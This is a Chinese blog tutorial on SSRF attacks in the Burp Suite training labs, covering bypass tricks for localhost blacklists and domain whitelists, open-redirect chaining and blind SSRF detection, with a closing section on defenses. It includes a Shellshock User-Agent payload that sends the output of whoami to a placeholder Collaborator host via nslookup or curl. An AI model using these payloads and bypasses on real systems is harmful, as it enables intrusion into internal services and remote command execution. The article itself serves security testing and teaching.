当前位置：首页 > article >正文

Burp靶场实战：SSRF漏洞的七种攻击场景与绕过技巧

article 2026/4/23 19:22:30

1. SSRF漏洞基础与Burp靶场环境搭建SSRFServer-Side Request Forgery漏洞的本质是服务器对用户提供的URL未做充分校验导致攻击者能够操控服务器发起非预期请求。想象一下你让朋友去超市买牛奶结果他拿着你的信用卡刷遍了整条街——SSRF就是这种越权代购的安全问题。在Burp Suite官方提供的SSRF靶场中我们主要使用三个核心工具Repeater用于手动修改和重放请求适合精确控制攻击参数Intruder自动化批量测试工具适合端口扫描和模糊测试Collaborator带外检测神器能捕获盲SSRF产生的网络交互搭建实验环境只需三步访问PortSwigger官网下载最新版Burp Suite Professional在Dashboard点击New temporary project创建临时项目通过Target→Scope添加靶场域名(如*.web-security-academy.net)我常遇到新手两个配置问题忘记安装CA证书导致HTTPS流量无法解密需访问http://burp/下载安装Collaborator域名被防火墙拦截可在Project options→Connections设置代理2. 基础SSRF攻击实战2.1 本地服务器攻击这个实验演示了最经典的SSRF场景绕过前端限制访问本地管理接口。关键点在于理解服务器如何处理相对URL和绝对URL。当发现stockApi参数接受完整URL时立即想到替换为http://localhost/admin。实际操作中有个细节容易被忽略管理页面返回的是302重定向需要勾选Repeater的Follow redirections选项。我曾在这个坑里浪费半小时直到发现删除请求返回的是302而不是200。绕过技巧进阶尝试127.0.0.1替代localhost使用十进制IP如2130706433127.0.0.1的十进制表示测试IPv6地址[::1]2.2 内网系统探测当目标存在二级系统时SSRF就变成了内网探测工具。这个实验教会我们如何用Intruder进行自动化端口扫描。重点在于设置Attack type为SniperPayload类型选Numbers范围1-255添加Grep匹配规则来识别管理页面特征实测发现内网服务常用端口8080备用HTTP服务8443备用HTTPS服务9000开发调试端口3. 进阶绕过技术3.1 黑名单过滤绕过当遇到localhost/127.0.0.1被过滤时这些技巧很实用域名指向localtest.me → 127.0.0.1IP变形127.1省略末尾.0.1特殊域名0x7f000001.nip.io → 127.0.0.1URL编码%6c%6f%63%61%6c%68%6f%73%74localhost的URL编码有个有趣的案例某次测试发现系统过滤了admin路径但用%2561dmina双编码成功绕过这是因为WAF通常只做单层解码。3.2 开放重定向利用当直接SSRF被拦截时可以寻找网站上的开放重定向点。常见漏洞位置登录/注销功能语言切换接口文件下载参数在实验中/product/nextProduct?path参数就是个典型例子。构造攻击URL时要注意先用简单路径测试重定向是否生效确保最终跳转地址包含协议头http://对特殊字符进行URL编码4. 盲SSRF与带外检测4.1 Collaborator基础用法盲SSRF就像闭着眼睛打靶Collaborator就是我们的声音反馈系统。使用技巧在Repeater右键插入Collaborator Payload设置Polling时间间隔为2秒检查DNS和HTTP两种交互记录有个实用技巧在Collaborator客户端点击Copy to clipboard后直接粘贴到Intruder的Payload里避免手动输入错误。4.2 Shellshock组合攻击这个实验展示了如何将SSRF与其它漏洞结合利用。关键步骤安装Collaborator Everywhere扩展构造特殊User-Agent头() { :; }; /usr/bin/nslookup $(whoami).xxxxxxxx.oastify.com使用Intruder爆破内网IP段遇到过的问题某些系统限制DNS查询可以改用curl发起HTTP请求() { :; }; curl http://xxxxxx.oastify.com/$(whoami)5. 白名单绕过艺术5.1 URL解析差异利用不同库解析URL存在差异这正是绕过机会。实验中的技巧利用符号分隔认证信息userhost使用#号片段标识符http://host#evil.com双重编码特殊字符# → %23 → %2523实际案例某次测试发现系统验证域名白名单时后端使用Java的URI类解析识别localhost%2523domain.com为domain.com而请求时使用URL类解析实际连接localhost5.2 非标准端口利用当遇到域名白名单时可以尝试子域名接管ssrf.example.com指向127.0.0.1端口混淆localhost:80evil.com:8080特殊协议file:///etc/passwd有个绕过Cloudflare的案例利用URL解析器对非标准端口的处理差异构造http://localhost:80%20evil.com这样的畸形地址。6. 防御方案与测试要点虽然本文聚焦攻击但作为负责任的测试人员必须了解防御措施网络层限制服务器出站流量应用层使用固定白名单域名库代码层禁用URL跟随重定向在测试报告中应当注明漏洞触发条件和影响范围修复优先级建议CVSS评分具体的修复代码示例如ALLOWED_DOMAINS [api.example.com] parsed urlparse(url) if parsed.hostname not in ALLOWED_DOMAINS: raise SecurityException(Invalid URL)7. 实战经验与排查技巧排查SSRF漏洞时我习惯先用这三个步骤找所有接受URL的参数不仅限于http://开头的测试不同协议file://, ftp://, gopher://修改请求方法GET参数可能在POST中同样有效遇到过最隐蔽的SSRF案例某JSON接口接受{server:api.internal}这样的参数后端自动补全http://前缀。这提醒我们测试时要尝试各种参数格式。Burp的Match and Replace功能在测试中很实用自动添加X-Forwarded-For头替换所有http为https追加特定查询参数最后提醒测试内网SSRF一定要获得书面授权避免触碰法律红线。真实环境中我会先用Collaborator确认漏洞存在再与客户确认测试范围。

Burp靶场实战：SSRF漏洞的七种攻击场景与绕过技巧

相关文章：

Burp靶场实战：SSRF漏洞的七种攻击场景与绕过技巧

大模型训练实战：Attention与MoE层并行配置的5个关键调优技巧（附16卡实测数据）

TCN时序卷积网络：从因果与空洞卷积到高效序列建模实战

告别Navicat！用JetBrains DataGrip 2023.3一站式管理MySQL、PostgreSQL等主流数据库

别再只会optimizer.step()了！详解PyTorch优化器的param_groups与动态调参技巧

技术深度：AB Download Manager的架构解构与高性能扩展体系

PrimeTime约束检查的隐藏技巧：用好all_fanin和get_attribute命令快速Debug

保姆级指南：用MBIST算法给SRAM‘体检’，手把手解读故障模型与修复策略

如何快速将网页内容保存为Markdown：MarkDownload扩展完整指南

如何利用HTTrack实现网站完整离线备份：从零开始的终极指南

终极指南：如何用IDR交互式Delphi反编译器快速分析Windows程序

如何快速使用Kemono下载器：WinUI3批量下载完整指南

避开F28377D eCAP配置的那些坑：GPIO异步模式、InputXbar与中断标志位清理详解

iOS开发者必看：深度解析.plist文件，从蒲公英/Fir平台安全提取IPA的底层原理

《UE5_C++多人游戏开发实战》学习笔记3 ——《P4 局域网联机测试与蓝图网络事件（LAN Testing Blueprint Networking）》

别再手动传数据了！用VisionMaster全局变量+脚本，5分钟搞定多流程数据共享

从草图到总装：用CREO骨架模型（Skeleton）搞定复杂产品TOP-DOWN设计全流程

【AutoSar_UDS服务】0x14服务_清除DTC：从原理到实战的深度解析

MongoDB GridFS

LitCAD：免费开源二维CAD绘图软件，轻松入门专业绘图

从Edge WL到Page差异：深入NAND Flash内部，拆解Read Disturb的‘攻击路径’

智能状态员中的行为变化与条件转移

从电机控制到光伏逆变器：Clark/Park变换的‘单相应用’实战避坑指南

Rockchip VI模块深度解析：MIPI接口配置与多通道数据处理技巧

基于Python的智能学习平台设计与实现毕业设计源码

16G显存能跑的本地模型精选（2026年）

AI开发烂尾病有救了！Anthropic推出Harness多Agent框架

网页端如何通过jQuery完成芯片制造文档的断点续传？

iperf3网络测速不准？别急，先检查这3个Linux内核参数（附调优命令）

BilibiliDown：跨平台B站视频下载解决方案的技术架构与高效使用指南